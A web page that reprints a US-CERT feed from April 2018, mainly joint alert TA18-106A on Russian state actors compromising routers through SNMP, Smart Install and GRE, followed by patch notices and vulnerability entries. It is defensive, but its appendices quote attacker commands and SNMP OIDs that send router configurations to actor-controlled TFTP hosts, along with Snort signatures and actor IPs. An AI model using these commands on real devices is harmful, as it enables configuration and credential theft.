
We are constantly interested in the latest and up-to-date technology.
As we move forward with the software development we will continue to use new technologies to improve our products and the customer experience. And we will continue to develop our solutions with both new functionality and increasing integration with the latest major platforms.
As the growing market shares and interests in the I.T. virtualization, we tailored the unique virtualization solution vFleXtor using proven, modern up-to-date technology.
US-CERT: The United States Computer Emergency Readiness Team
-
Original release date: April 18, 2018
Drupal has released updates addressing a vulnerability in Drupal 8 and 7. A remote attacker could exploit this vulnerability to gain access to sensitive information.
NCCIC encourages users and administrators to review the Drupal Security Advisory for additional information and apply the necessary updates.
This product is provided subject to this Notification and this Privacy & Use policy.
-
Original release date: April 18, 2018
Cisco has released several updates to address vulnerabilities affecting multiple products. A remote attacker could exploit some of these vulnerabilities to take control of an affected system.
NCCIC encourages users and administrators to review the following Cisco Security Advisories and apply the necessary updates:
- Cisco WebEx Clients Remote Code Execution Vulnerability cisco-sa-20180418-wbs
- Cisco UCS Director Virtual Machine Information Disclosure Vulnerability for End User Portal cisco-sa-20180418-uscd
- Cisco StarOS Interface Forwarding Denial of Service Vulnerability cisco-sa-20180418-staros
- Cisco IOS XR Software UDP Broadcast Forwarding Denial of Service Vulnerability cisco-sa-20180418-iosxr
- Cisco Firepower Detection Engine Secure Sockets Layer Denial of Service Vulnerability cisco-sa-20180418-fpsnort
- Cisco Firepower 2100 Series Security Appliances IP Fragmentation Denial of Service Vulnerability cisco-sa-20180418-fp2100
- Cisco ASA Software, FTD Software, and AnyConnect Secure Mobility Client SAML Authentication Session Fixation Vulnerability cisco-sa-20180418-asaanyconnect
- Cisco Adaptive Security Appliance Application Layer Protocol Inspection Denial of Service Vulnerabilities cisco-sa-20180418-asa_inspect
- Cisco Adaptive Security Appliance TLS Denial of Service Vulnerability cisco-sa-20180418-asa3
- Cisco Adaptive Security Appliance Flow Creation Denial of Service Vulnerability cisco-sa-20180418-asa2
- Cisco Adaptive Security Appliance Virtual Private Network SSL Client Certificate Bypass Vulnerability cisco-sa-20180418-asa1
This product is provided subject to this Notification and this Privacy & Use policy.
-
Original release date: April 18, 2018
Google has released Chrome version 66.0.3359.117 for Windows, Mac, and Linux. This version addresses vulnerabilities that a remote attacker could exploit to take control of an affected system.
NCCIC encourages users and administrators to review the Chrome Releases page and apply the necessary update.
This product is provided subject to this Notification and this Privacy & Use policy.
-
Original release date: April 17, 2018
Oracle has released its Critical Patch Update for April 2018 to address 254 vulnerabilities across multiple products. A remote attacker could exploit some of these vulnerabilities to take control of an affected system.
NCCIC encourages users and administrators to review the Oracle April 2018 Critical Patch Update and apply the necessary updates.
This product is provided subject to this Notification and this Privacy & Use policy.
-
Original release date: April 16, 2018 | Last revised: April 20, 2018
Systems Affected
- Generic Routing Encapsulation (GRE) Enabled Devices
- Cisco Smart Install (SMI) Enabled Devices
- Simple Network Management Protocol (SNMP) Enabled Network Devices
Overview
Update: On April 19, 2018, an industry partner notified NCCIC and the FBI of malicious cyber activity that aligns with the techniques, tactics, and procedures (TTPs) and network indicators listed in this Alert. Specifically, the industry partner reported the actors redirected DNS queries to their own infrastructure by creating GRE tunnels and obtained sensitive information, which include the configuration files of networked devices.
NCCIC encourages organizations to use the detection and prevention guidelines outlined in this Alert to help defend against this activity. For instance, administrators should inspect the presence of protocol 47 traffic flowing to or from unexpected addresses, or unexplained presence of GRE tunnel creation, modification, or destruction in log files.
Original Post: This joint Technical Alert (TA) is the result of analytic efforts between the Department of Homeland Security (DHS), the Federal Bureau of Investigation (FBI), and the United Kingdom?s National Cyber Security Centre (NCSC). This TA provides information on the worldwide cyber exploitation of network infrastructure devices (e.g., router, switch, firewall, Network-based Intrusion Detection System (NIDS) devices) by Russian state-sponsored cyber actors. Targets are primarily government and private-sector organizations, critical infrastructure providers, and the Internet service providers (ISPs) supporting these sectors. This report contains technical details on the tactics, techniques, and procedures (TTPs) used by Russian state-sponsored cyber actors to compromise victims. Victims were identified through a coordinated series of actions between U.S. and international partners. This report builds on previous DHS reporting and advisories from the United Kingdom, Australia, and the European Union. [1-5] This report contains indicators of compromise (IOCs) and contextual information regarding observed behaviors on the networks of compromised victims. FBI has high confidence that Russian state-sponsored cyber actors are using compromised routers to conduct man-in-the-middle attacks to support espionage, extract intellectual property, maintain persistent access to victim networks, and potentially lay a foundation for future offensive operations.
DHS, FBI, and NCSC urge readers to act on past alerts and advisories issued by the U.S. and U.K. Governments, allied governments, network device manufacturers, and private-sector security organizations. Elements from these alerts and advisories have been selected and disseminated in a wide variety of security news outlets and social media platforms. The current state of U.S. network devices?coupled with a Russian government campaign to exploit these devices?threatens the safety, security, and economic well-being of the United States.
The purpose of this TA is to inform network device vendors, ISPs, public-sector organizations, private-sector corporations, and small office home office (SOHO) customers about the Russian government campaign, provide information to identify malicious activity, and reduce exposure to this activity.
For a downloadable copy of the IOC package, see TA18-106A_TLP_WHITE.stix.xml.
Description
Since 2015, the U.S. Government received information from multiple sources?including private and public sector cybersecurity research organizations and allies?that cyber actors are exploiting large numbers of enterprise-class and SOHO/residential routers and switches worldwide. The U.S. Government assesses that cyber actors supported by the Russian government carried out this worldwide campaign. These operations enable espionage and intellectual property theft that supports the Russian Federation?s national security and economic goals.
Legacy Protocols and Poor Security Practice
Russian cyber actors leverage a number of legacy or weak protocols and service ports associated with network administration activities. Cyber actors use these weaknesses to
- identify vulnerable devices;
- extract device configurations;
- map internal network architectures;
- harvest login credentials;
- masquerade as privileged users;
- modify
- device firmware,
- operating systems,
- configurations; and
- copy or redirect victim traffic through Russian cyber-actor-controlled infrastructure.
Additionally, Russian cyber actors could potentially modify or deny traffic traversing through the router.
Russian cyber actors do not need to leverage zero-day vulnerabilities or install malware to exploit these devices. Instead, cyber actors take advantage of the following vulnerabilities:
- devices with legacy unencrypted protocols or unauthenticated services,
- devices insufficiently hardened before installation, and
- devices no longer supported with security patches by manufacturers or vendors (end-of-life devices).
These factors allow for both intermittent and persistent access to both intellectual property and U.S. critical infrastructure that supports the health and safety of the U.S. population.
Own the Router, Own the Traffic
Network devices are ideal targets. Most or all organizational and customer traffic must traverse these critical devices. A malicious actor with presence on an organization?s gateway router has the ability to monitor, modify, and deny traffic to and from the organization. A malicious actor with presence on an organization?s internal routing and switching infrastructure can monitor, modify, and deny traffic to and from key hosts inside the network and leverage trust relationships to conduct lateral movement to other hosts. Organizations that use legacy, unencrypted protocols to manage hosts and services, make successful credential harvesting easy for these actors. An actor controlling a router between Industrial Control Systems ? Supervisory Control and Data Acquisition (ICS-SCADA) sensors and controllers in a critical infrastructure?such as the Energy Sector?can manipulate the messages, creating dangerous configurations that could lead to loss of service or physical destruction. Whoever controls the routing infrastructure of a network essentially controls the data flowing through the network.
Network Devices?Often Easy Targets
- Network devices are often easy targets. Once installed, many network devices are not maintained at the same security level as other general-purpose desktops and servers. The following factors can also contribute to the vulnerability of network devices:
- Few network devices?especially SOHO and residential-class routers?run antivirus, integrity-maintenance, and other security tools that help protect general purpose hosts.
- Manufacturers build and distribute these network devices with exploitable services, which are enabled for ease of installation, operation, and maintenance.
- Owners and operators of network devices do not change vendor default settings, harden them for operations, or perform regular patching.
- ISPs do not replace equipment on a customer?s property when that equipment is no longer supported by the manufacturer or vendor.
- Owners and operators often overlook network devices when they investigate, examine for intruders, and restore general-purpose hosts after cyber intrusions.
Impact
Stage 1: Reconnaissance
Russian state-sponsored cyber actors have conducted both broad-scale and targeted scanning of Internet address spaces. Such scanning allows these actors to identify enabled Internet-facing ports and services, conduct device fingerprinting, and discover vulnerable network infrastructure devices. Protocols targeted in this scanning include
- Telnet (typically Transmission Control Protocol (TCP) port 23, but traffic can be directed to a wide range of TCP ports such as 80, 8080, etc.),
- Hypertext Transport Protocol (HTTP, port 80),
- Simple Network Management Protocol (SNMP, ports 161/162), and
- Cisco Smart Install (SMI port 4786).
Login banners and other data collected from enabled services can reveal the make and model of the device and information about the organization for future engagement.
Device configuration files extracted in previous operations can enhance the reconnaissance effort and allow these actors to refine their methodology.
Stage 2: Weaponization and Stage 3: Delivery
Commercial and government security organizations have identified specially crafted SNMP and SMI packets that trigger the scanned device to send its configuration file to a cyber-actor-controlled host via Trivial File Transfer Protocol (TFTP), User Datagram Protocol (UDP) port 69. [6-8] If the targeted network is blocking external SNMP at the network boundary, cyber actors spoof the source address of the SNMP UDP datagram as coming from inside the targeted network. The design of SMI (directors and clients) requires the director and clients to be on the same network. However, since SMI is an unauthenticated protocol, the source address for SMI is also susceptible to spoofing.
The configuration file contains a significant amount of information about the scanned device, including password hash values. These values allow cyber actors to derive legitimate credentials. The configuration file also contains SNMP community strings and other network information that allows the cyber actors to build network maps and facilitate future targeted exploitation.
Stage 4: Exploitation
Legitimate user masquerade is the primary method by which these cyber actors exploit targeted network devices. In some cases, the actors use brute-force attacks to obtain Telnet and SSH login credentials. However, for the most part, cyber actors are able to easily obtain legitimate credentials, which they then use to access routers. Organizations that permit default or commonly used passwords, have weak password policies, or permit passwords that can be derived from credential-harvesting activities, allow cyber actors to easily guess or access legitimate user credentials. Cyber actors can also access legitimate credentials by extracting password hash values from configurations sent by owners and operators across the Internet or by SNMP and SMI scanning.
Armed with the legitimate credentials, cyber actors can authenticate into the device as a privileged user via remote management services such as Telnet, SSH, or the web management interface.
Stage 5: Installation
SMI is an unauthenticated management protocol developed by Cisco. This protocol supports a feature that allows network administrators to download or overwrite any file on any Cisco router or switch that supports this feature. This feature is designed to enable network administrators to remotely install and configure new devices and install new OS files.
On November 18, 2016, a Smart Install Exploitation Tool (SIET) was posted to the Internet. The SIET takes advantage of the unauthenticated SMI design. Commercial and government security organizations have noted that Russian state-sponsored cyber actors have leveraged the SIET to abuse SMI to download current configuration files. Of concern, any actor may leverage this capability to overwrite files to modify the device configurations, or upload maliciously modified OS or firmware to enable persistence. Additionally, these network devices have writeable file structures where malware for other platforms may be stored to support lateral movement throughout the targeted network.
Stage 6: Command and Control
Cyber actors masquerade as legitimate users to log into a device or establish a connection via a previously uploaded OS image with a backdoor. Once successfully logged into the device, cyber actors execute privileged commands. These cyber actors create a man-in-the-middle scenario that allows them to
- extract additional configuration information,
- export the OS image file to an externally located cyber actor-controlled FTP server,
- modify device configurations,
- create Generic Routing Encapsulation (GRE) tunnels, or
- mirror or redirect network traffic through other network infrastructure they control.
At this stage, cyber actors are not restricted from modifying or denying traffic to and from the victim. Although there are no reports of this activity, it is technically possible.
Solution
Telnet
Review network device logs and netflow data for indications of TCP Telnet-protocol traffic directed at port 23 on all network device hosts. Although Telnet may be directed at other ports (e.g., port 80, HTTP), port 23 is the primary target. Inspect any indication of Telnet sessions (or attempts). Because Telnet is an unencrypted protocol, session traffic will reveal command line interface (CLI) command sequences appropriate for the make and model of the device. CLI strings may reveal login procedures, presentation of user credentials, commands to display boot or running configuration, copying files and creation or destruction of GRE tunnels, etc. See Appendices A and B for CLI strings for Cisco and other vendors? devices.
SNMP and TFTP
Review network device logs and netflow data for indications of UDP SNMP traffic directed at port 161/162 on all network-device hosts. Because SNMP is a management tool, any such traffic that is not from a trusted management host on an internal network should be investigated. Review the source address of SNMP traffic for indications of addresses that spoof the address space of the network. Review outbound network traffic from the network device for evidence of Internet-destined UDP TFTP traffic. Any correlation of inbound or spoofed SNMP closely followed by outbound TFTP should be cause for alarm and further inspection. See Appendix C for detection of the cyber actors? SNMP tactics.
Because TFTP is an unencrypted protocol, session traffic will reveal strings associated with configuration data appropriate for the make and model of the device. See Appendices A and B for CLI strings for Cisco and other vendor?s devices.
SMI and TFTP
Review network device logs and netflow data for indications of TCP SMI protocol traffic directed at port 4786 of all network-device hosts. Because SMI is a management feature, any traffic that is not from a trusted management host on an internal network should be investigated. Review outbound network traffic from the network device for evidence of Internet-destined UDP TFTP traffic. Any correlation of inbound SMI closely followed by outbound TFTP should be cause for alarm and further inspection. Of note, between June 29 and July 6, 2017, Russian actors used the SMI protocol to scan for vulnerable network devices. Two Russian cyber actors controlled hosts 91.207.57.69(3) and 176.223.111.160(4), and connected to IPs on several network ranges on port 4786. See Appendix D for detection of the cyber actors? SMI tactics.
Because TFTP is an unencrypted protocol, session traffic will reveal strings appropriate for the make and model of the device. See Appendices A and B for CLI strings for Cisco and other vendors? devices.
Determine if SMI is present
- Examine the output of ?show vstack config | inc Role?. The presence of ?Role: Client (SmartInstall enabled)? indicates that Smart Install is configured.
- Examine the output of "show tcp brief all" and look for "*:4786". The SMI feature listens on tcp/4786.
- Note: The commands above will indicate whether the feature is enabled on the device but not whether a device has been compromised.
Detect use of SMI
The following signature may be used to detect SMI usage. Flag as suspicious and investigate SMI traffic arriving from outside the network boundary. If SMI is not used inside the network, any SMI traffic arriving on an internal interface should be flagged as suspicious and investigated for the existence of an unauthorized SMI director. If SMI is used inside the network, ensure that the traffic is coming from an authorized SMI director, and not from a bogus director.
- alert tcp any any -> any 4786 (msg:"Smart Install Protocol"; flow:established,only_stream; content:"|00 00 00 01 00 00 00 01|"; offset:0; depth:8; fast_pattern;)
- See Cisco recommendations for detecting and mitigating SMI. [9]
Detect use of SIET
The following signatures detect usage of the SIET's commands change_config, get_config, update_ios, and execute. These signatures are valid based on the SIET tool available as of early September 2017:
- alert tcp any any -> any 4786 (msg:"SmartInstallExploitationTool_UpdateIos_And_Execute"; flow:established; content:"|00 00 00 01 00 00 00 01 00 00 00 02 00 00 01 c4|"; offset:0; depth:16; fast_pattern; content:"://";)
- alert tcp any any -> any 4786 (msg:"SmartInstallExploitationTool_ChangeConfig"; flow:established; content:"|00 00 00 01 00 00 00 01 00 00 00 03 00 00 01 28|"; offset:0; depth:16; fast_pattern; content:"://";)
- alert tcp any any -> any 4786 (msg: "SmartInstallExploitationTool_GetConfig"; flow: established; content:"|00 00 00 01 00 00 00 01 00 00 00 08 00 00 04 08|"; offset:0; depth:16; fast_pattern; content:"copy|20|";)
In general, exploitation attempts with the SIET tool will likely arrive from outside the network boundary. However, before attempting to tune or limit the range of these signatures, i.e. with $EXTERNAL_NET or $HOME_NET, it is recommended that they be deployed with the source and destination address ranges set to ?any?. This will allow the possibility of detection of an attack from an unanticipated source, and may allow for coverage of devices outside of the normal scope of what may be defined as the $HOME_NET.
GRE Tunneling
Inspect the presence of protocol 47 traffic flowing to or from unexpected addresses, or unexplained presence of GRE tunnel creation, modification, or destruction in log files.
Mitigation Strategies
There is a significant amount of publically available cybersecurity guidance and best practices from DHS, allied government, vendors, and the private-sector cybersecurity community on mitigation strategies for the exploitation vectors described above. The following are additional mitigations for network device manufacturers, ISPs, and owners or operators.
General Mitigations
All
- Do not allow unencrypted (i.e., plaintext) management protocols (e.g. Telnet) to enter an organization from the Internet. When encrypted protocols such as SSH, HTTPS, or TLS are not possible, management activities from outside the organization should be done through an encrypted Virtual Private Network (VPN) where both ends are mutually authenticated.
- Do not allow Internet access to the management interface of any network device. The best practice is to block Internet-sourced access to the device management interface and restrict device management to an internal trusted and whitelisted host or LAN. If access to the management interface cannot be restricted to an internal trusted network, restrict remote management access via encrypted VPN capability where both ends are mutually authenticated. Whitelist the network or host from which the VPN connection is allowed, and deny all others.
- Disable legacy unencrypted protocols such as Telnet and SNMPv1 or v2c. Where possible, use modern encrypted protocols such as SSH and SNMPv3. Harden the encrypted protocols based on current best security practice. DHS strongly advises owners and operators to retire and replace legacy devices that cannot be configured to use SNMP V3.
- Immediately change default passwords and enforce a strong password policy. Do not reuse the same password across multiple devices. Each device should have a unique password. Where possible, avoid legacy password-based authentication, and implement two-factor authentication based on public-private keys. See NCCIC/US-CERT TA13-175A ? Risks of Default Passwords on the Internet, last revised October 7, 2016.
Manufacturers
- Do not design products to support legacy or unencrypted protocols. If this is not possible, deliver the products with these legacy or unencrypted protocols disabled by default, and require the customer to enable the protocols after accepting an interactive risk warning. Additionally, restrict these protocols to accept connections only from private addresses (i.e., RFC 1918).
- Do not design products with unauthenticated services. If this is not possible, deliver the products with these unauthenticated services disabled by default, and require the customer to enable the services after accepting an interactive risk warning. Additionally, these unauthenticated services should be restricted to accept connections only from private address space (i.e., RFC 1918).
- Design installation procedures or scripts so that the customer is required to change all default passwords. Encourage the use of authentication services that do not depend on passwords, such as RSA-based Public Key Infrastructure (PKI) keys.
- Because YARA has become a security-industry standard way of describing rules for detecting malicious code on hosts, consider embedding YARA or a YARA-like capability to ingest and use YARA rules on routers, switches, and other network devices.
Security Vendors
- Produce and publish YARA rules for malware discovered on network devices.
ISPs
- Do not field equipment in the network core or to customer premises with legacy, unencrypted, or unauthenticated protocols and services. When purchasing equipment from vendors, include this requirement in purchase agreements.
- Disable legacy, unencrypted, or unauthenticated protocols and services. Use modern encrypted management protocols such as SSH. Harden the encrypted protocols based on current best security practices from the vendor.
- Initiate a plan to upgrade fielded equipment no longer supported by the vendor with software updates and security patches. The best practice is to field only supported equipment and replace legacy equipment prior to it falling into an unsupported state.
- Apply software updates and security patches to fielded equipment. When that is not possible, notify customers about software updates and security patches and provide timely instructions on how to apply them.
Owners or operators
- Specify in contracts that the ISP providing service will only field currently supported network equipment and will replace equipment when it falls into an unsupported state.
- Specify in contracts that the ISP will regularly apply software updates and security patches to fielded network equipment or will notify and provide the customers the ability to apply them.
- Block TFTP from leaving the organization destined for Internet-based hosts. Network devices should be configured to send configuration data to a secured host on a trusted segment of the internal management LAN.
- Verify that the firmware and OS on each network device are from a trusted source and issued by the manufacturer. To validate the integrity of network devices, refer to the vendor?s guidance, tools, and processes. See Cisco?s Security Center for guidance to validate Cisco IOS firmware images.
- Cisco IOS runs in a variety of network devices under other labels, such as Linksys and SOHO Internet Gateway routers or firewalls as part of an Internet package by ISPs (e.g., Comcast). The indicators in Appendix A may be applicable to your device.
Detailed Mitigations
Refer to the vendor-specific guidance for the make and model of network device in operation.
For information on mitigating SNMP vulnerabilities, see
- NCCIC/US-CERT Alert TA17-156A ? Reducing the Risk of SNMP Abuse, June 5, 2017, and
- NCCIC/US-CERT Alert TA16-250A ? The Increasing Threat to Network Infrastructure Devices and Recommended Mitigations, September 6, 2016 Updated September 28, 2016.
How to Mitigate SMI Abuse
- Configure network devices before installing onto a network exposed to the Internet. If SMI must be used during installation, disable SMI with the ?no vstack? command before placing the device into operation.
- Prohibit remote devices attempting to cross a network boundary over TCP port 4786 via SMI.
- Prohibit outbound network traffic to external devices over UDP port 69 via TFTP.
- See Cisco recommendations for detecting and mitigating SMI. [10]
- Cisco IOS runs in a variety of network devices under other labels, such as Linksys and SOHO Internet Gateway routers or firewalls as part of an Internet package by ISPs (e.g., Comcast). Check with your ISP and ensure that they have disabled SMI before or at the time of installation, or obtain instructions on how to disable it.
How to Mitigate GRE Tunneling Abuse:
- Verify that all routing tables configured in each border device are set to communicate with known and trusted infrastructure.
- Verify that any GRE tunnels established from border routers are legitimate and are configured to terminate at trusted endpoints.
Definitions
Operating System Fingerprinting is analyzing characteristics of packets sent by a target, such as packet headers or listening ports, to identify the operating system in use on the target. [11]
Spear phishing is an attempt by an individual or group to solicit personal information from unsuspecting users by employing social engineering techniques. Phishing emails are crafted to appear as if they were sent from a legitimate organization or known individual. These emails often attempt to entice users to click on a link that will take the user to a fraudulent website that appears legitimate. The user then may be asked to provide personal information, such as account usernames and passwords, which can further expose them to future compromises. [12]
In a watering hole attack, the attacker compromises a site likely to be visited by a particular target group, rather than attacking the target group directly. [13]
Report Notice
DHS encourages recipients who identify the use of tools or techniques discussed in this document to report information to NCCIC or law enforcement immediately. To request incident response resources or technical assistance, contact NCCIC at NCCICcustomerservice@hq.dhs.gov or 888-282-0870 and the FBI through a local field office or the FBI?s Cyber Division at CyWatch@fbi.gov or 855-292-3937. To request information from or report cyber incidents to UK authorities, contact NCSC at www.ncsc.gov.uk/contact.
Appendix A: Cisco Related Command and Configuration Strings
Command Strings.
Commands associated with Cisco IOS. These strings may be seen in inbound network traffic of unencrypted management tools such as Telnet or HTTP, in the logs of application layer firewalls, or in the logs of network devices. Network device owners and operators should review the Cisco documentation of their particular makes and models for strings that would allow the owner or operator to customize the list for an Intrusion Detection System (IDS). Detecting commands from Internet-based hosts should be a cause for concern and further investigation. Detecting these strings in network traffic or log files does not confirm compromise. Further analysis is necessary to remove false positives.
Strings:
'sh arp'
'sho arp'
'show arp'
'sh bgp sum'
'sho bgp sum'
'show bgp sum'
'sh cdp'
'sho cdp'
'show cdp'
'sh con'
'sho con'
'show con'
'sh ip route'
'sho ip route'
'show ip route'
'sh inv'
'sho inv'
'show inv'
'sh int'
'sho int'
'show int'
'sh nat trans'
'sho nat trans'
'show nat trans'
'sh run'
'sho run'
'show run'
'sh ver'
'sho ver'
'show ver'
'sh isis'
'sho isis'
'show isis'
'sh rom-monitor'
'sho rom-monitor'
'show rom-monitor'
'sh startup-config'
'sho startup-config'
'show startup-config'
'sh boot'
'sho boot'
'show boot'
'enable'
'enable secret'Configuration Strings.
Strings associated with Cisco IOS configurations may be seen in the outbound network traffic of unencrypted management tools such as Telnet, HTTP, or TFTP. This is a subset of the possible strings. Network device owners and operators should export the configuration of their particular makes and models to a secure host and examine it for strings that would allow the owner or operator to customize the list for an IDS. Detecting outbound configuration data leaving an organization destined for Internet-based hosts should be a cause for concern and further investigation to ensure the destination is authorized to receive the configuration data. Because configuration data provides an adversary with information?such as the password hashes?to enable future attacks, configuration data should be encrypted between sender and receiver. Outbound configuration files may be triggered by SNMP queries and Cisco Smart Install commands. In such cases, the outbound file would be sent via TFTP. Detecting these strings in network traffic or log files does not confirm compromise. Further analysis is necessary to remove false positives.
Strings:
aaa new-model
advertisement version
BGP router identifier
boot system flash:
Building configuration?
Cisco Internetwork Operating System
Cisco IOS Software,
Configuration register
www.cisco.com/techsupport
Codes C ? connected, S ? static
configuration memory
Current configuration :
boot-start-marker
! Last configuration change at
! NVRAM config last updated at
interface VLAN
interface FastEthernet
interface GigabitEthernet
interface pos
line protocol is
loopback not set
ip access-list extended
nameif outside
Routing Bit Set on this LSA
route source
router bgp
router ospf
routing table
ROM: Bootstrap program is
snmp-server
system bootstrap
System image file is
PIX VERSION
ASA VERSION
(ASA)
boot-start-marker
boot system flash
boot end-marker
BOOT path-listAppendix B: Other Vendor Command and Configuration Strings
Russian state-sponsored cyber actors could potentially target the network devices from other manufacturers. Therefore, operators and owners should review the documentation associated with the make and model they have in operation to identify strings associated with administrative functions. Export the current configuration and identify strings associated with the configuration. Place the device-specific administrative and configuration strings into network-based and host-based IDS. Examples for Juniper JUNOS may include: ?enable?, ?reload?, ?show?, ?set?, ?unset? ?file copy?, or ?request system scripts? followed by other expected parameters. Examples for MicroTic may include: ?ip?, ?interface?, ?firewall?, ?password?, or ?ping?. See the documentation for your make and model for specific strings and parameters to place on watch.
These strings may be seen in inbound network traffic of unencrypted management tools such as Telnet or HTTP, in the logs of application layer firewalls or network devices. Detecting commands from Internet-based hosts should be a cause for concern and further investigation. Detecting these strings in network traffic or log files does not confirm compromise. Further analysis is necessary to remove false positives.
The following are important functions to monitor:
- login
- displaying or exporting the current configuration
- copying files from the device to another host, especially a host outside the LAN or one not previously authorized
- copying files to the device from another host, especially a host outside the LAN or one not previously authorized
- changes to the configuration
- creation or destruction of GRE tunnels
Appendix C: SNMP Queries
- SNMP query containing any of the following from an external host
- show run
- show ip arp
- show version
- show ip route
- show neighbor detail
- show interface
- SNMP Command ID 1.3.6.1.4.1.9.9.96 with the TFTP server IP parameter of ?80.255.3.85?
- SNMP and Cisco's "config copy" management information base (MIB) object identifiers (OIDs) Command ID 1.3.6.1.4.1.9.9.96 with the TFTP server IP parameter of ?87.120.41.3? and community strings of ?public? ?private? or ?anonymous?
OID Name OID Value Meaning 1.3.6.1.4.1.9.9.96.1.1.1.1.2 1 Protocol type = TFTP 1.3.6.1.4.1.9.9.96.1.1.1.1.3 1 Source file type = network file 1.3.6.1.4.1.9.9.96.1.1.1.1.4 4 Destination file type = running config 1.3.6.1.4.1.9.9.96.1.1.1.1.5 87.120.41.3 TFTP server IP = 87.120.41.3 1.3.6.1.4.1.9.9.96.1.1.1.1.6 backup File name = backup 1.3.6.1.4.1.9.9.96.1.1.1.1.14 4 Activate the status of the table entry - SNMP Command ID 1.3.6.1.4.1.9.9.96 with the TFTP server IP parameter 80.255.3.85
- SNMP v2c and v1 set-requests with the OID 1.3.6.1.4.1.9.2.1.55 with the TFTP server IP parameter ?87.120.41.3?, using community strings ?private? and ?anonymous?
- The OID 1.3.6.1.4.1.9.2.1.55.87.120.41.3 is a request to transfer a copy of a router's configuration to the IP address specified in the last four octets of the OID, in this case 87.120.41.3.
- Since late July 2016, 87.120.41.3 has been scanning thousands of IPs worldwide using SNMP.
- Between November 21 and 22, 2016, Russian cyber actors attempted to scan using SNMP version 2 Object Identifier (OID) 1.3.6.1.4.9.9.96.1.1.1.1.5 with a value of 87.120.41.3 and a community string of ?public?. This command would cause vulnerable devices to exfiltrate configuration data to a specified IP address over TFTP; in this case, IP address 87.120.41.3.
- SNMP, TFTP, HTTP, Telnet, or SSH traffic to or from the following IPs
- 210.245.123.180
Appendix D: SMI Queries
Between June 29 and July 6, 2017, Russian actors used the Cisco Smart Install protocol to scan for vulnerable network devices. Two Russian cyber actor-controlled hosts, 91.207.57.69(3) and 176.223.111.160(4), connected to IPs on several network ranges on port 4786 and sent the following two commands:
- copy nvram:startup-config flash:/config.text
- copy nvram:startup-config tftp://[actor address]/[actor filename].conf
In early July 2017, the commands sent to targets changed slightly, copying the running configuration file instead of the startup configuration file. Additionally, the second command copies the file saved to flash memory instead of directly copying the configuration file.
- copy system:running-config flash:/config.text
- copy flash:/config.text tftp://[ actor address]/[actor filename].conf
References
- [1] The Increasing Threat to Network Infrastructure Devices and Recommended Mitigations. DHS. AR-16-20173. August 30, 2016.
- [2] Cisco Smart Install Protocol Issues. CERT-EU. Advisory 2017-003. February 22, 2017.
- [3] Internet Edge Device Security. United Kingdom. National Cyber Security Centre. May 12, 2017.
- [4] UK Internet Edge Router Devices: Advisory. United Kingdom. National Cyber Security Centre. August 11, 2017.
- [5] Routers Targeted. Australian Cyber Security Centre. August 16, 2017.
- [6] Cisco Smart Install Protocol Misuse. Cisco. February 14, 2017. Updated October 30, 2017.
- [7] Routers Targeted. Australian Cyber Security Centre. August 16, 2017.
- [8] Cisco Smart Install Protocol Misuse. NSA, IAD. August 7, 2017.
- [9] Cisco Smart Install Protocol Misuse. Cisco. February 14, 2017. Updated October 30, 2017.
- [10] Cisco Smart Install Protocol Misuse. Cisco. February 14, 2017. Updated October 30, 2017.
- [11] NIST CSRC.
- [12] US-CERT. Report Phishing.
- [13] CNSSI 4009-2015.
Revision History
- April 16, 2018: Initial Version
- April 19, 2018: Added third-party reporting
This product is provided subject to this Notification and this Privacy & Use policy.
-
Original release date: April 16, 2018
The Department of Homeland Security (DHS), Federal Bureau of Investigation (FBI), and the United Kingdom?s (UK) National Cyber Security Centre (NCSC) released a joint Technical Alert (TA) about malicious cyber activity carried out by the Russian Government. The U.S. Government refers to malicious cyber activity by the Russian government as GRIZZLY STEPPE.
NCCIC encourages users and administrators to review the GRIZZLY STEPPE - Russian Malicious Cyber Activity page, which links to TA18-106A - Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices, for more information.
This product is provided subject to this Notification and this Privacy & Use policy.
-
Original release date: April 16, 2018
The US-CERT Cyber Security Bulletin provides a summary of new vulnerabilities that have been recorded by the National Institute of Standards and Technology (NIST) National Vulnerability Database (NVD) in the past week. The NVD is sponsored by the Department of Homeland Security (DHS) National Cybersecurity and Communications Integration Center (NCCIC) / United States Computer Emergency Readiness Team (US-CERT). For modified or updated entries, please visit the NVD, which contains historical vulnerability information.
The vulnerabilities are based on the CVE vulnerability naming standard and are organized according to severity, determined by the Common Vulnerability Scoring System (CVSS) standard. The division of high, medium, and low severities correspond to the following scores:
High - Vulnerabilities will be labeled High severity if they have a CVSS base score of 7.0 - 10.0
Medium - Vulnerabilities will be labeled Medium severity if they have a CVSS base score of 4.0 - 6.9
Low - Vulnerabilities will be labeled Low severity if they have a CVSS base score of 0.0 - 3.9
Entries may include additional information provided by organizations and efforts sponsored by US-CERT. This information may include identifying information, values, definitions, and related links. Patch information is provided when available. Please note that some of the information in the bulletins is compiled from external, open source reports and is not a direct result of US-CERT analysis.
High Vulnerabilities
Back to topPrimary
Vendor -- ProductDescription Published CVSS Score Source & Patch Info cmsmadesimple -- cms_made_simple CMS Made Simple (CMSMS) through 2.2.6 allows PHP object injection because of an unserialize call in the _get_data function of \lib\classes\internal\class.LoginOperations.php. By sending a crafted cookie, a remote attacker can upload and execute code, or delete files. 2018-04-13 7.5 CVE-2018-10085
MISCMedium Vulnerabilities
Back to topPrimary
Vendor -- ProductDescription Published CVSS Score Source & Patch Info cmsmadesimple -- cms_made_simple CMS Made Simple (aka CMSMS) 2.2.7 has CSRF in admin/siteprefs.php. 2018-04-11 6.8 CVE-2018-10030
MISCcmsmadesimple -- cms_made_simple CMS Made Simple (aka CMSMS) 2.2.7 has CSRF in admin/moduleinterface.php. 2018-04-11 6.8 CVE-2018-10031
MISCcmsmadesimple -- cms_made_simple CMS Made Simple (CMSMS) through 2.2.7 allows physical path leakage via an invalid /index.php?page= value, a crafted URI starting with /index.php?mact=Search, or a direct request to /admin/header.php, /admin/footer.php, /lib/tasks/class.ClearCache.task.php, or /lib/tasks/class.CmsSecurityCheck.task.php. 2018-04-13 5.0 CVE-2018-10082
MISCcmsmadesimple -- cms_made_simple CMS Made Simple (CMSMS) through 2.2.7 contains an arbitrary file deletion vulnerability in the admin dashboard via directory traversal sequences in the val parameter within a cmd=del request, because code under modules\FilePicker does not restrict the val parameter. 2018-04-13 6.4 CVE-2018-10083
MISCcmsmadesimple -- cms_made_simple CMS Made Simple (CMSMS) through 2.2.6 contains a privilege escalation vulnerability from ordinary user to admin user by arranging for the eff_uid value within $_COOKIE[$this->_loginkey] to equal 1, because an SHA-1 cryptographic protection mechanism can be bypassed. 2018-04-13 6.5 CVE-2018-10084
